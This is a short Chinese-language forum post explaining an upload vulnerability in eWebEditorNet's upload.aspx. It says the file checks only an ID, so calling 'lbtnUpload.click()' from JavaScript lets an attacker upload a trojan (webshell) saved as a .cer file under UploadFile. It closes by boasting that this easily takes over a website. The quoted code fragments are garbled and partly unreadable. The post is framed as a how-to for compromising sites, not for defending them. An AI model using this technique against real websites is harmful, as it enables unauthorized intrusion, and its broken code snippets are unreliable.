eWebEditorNet 漏洞 upload.aspx
eWebEditorNet 主要是一个upload.aspx文件存在上传漏洞。原理:
代码 [*]<form id="post" encType="server">[*]"uploadfile" style="file" size="uploadfile" runat=[*]"lbtnUpload" runat=[*]"JavaScript">
复制代码 【注:此代码当前贴于 http://bbs.xdadmin.com】
只是简单的对ID进行验证
只要构造javascript:lbtnUpload.click();满足条件
达到上传木马的效果
成功以后查看源代码
代码 [*]a "lbtnUpload" "javascript:__doPostBack('lbtnUpload','')"</>script 'javascript'</>
复制代码 【注:此代码当前贴于 http://bbs.xdadmin.com】
木马的具体地址为
/eWebEditorNet/UploadFile/200801141044412198.cer
这样就轻松的拿下了一个网站。
页:
[1]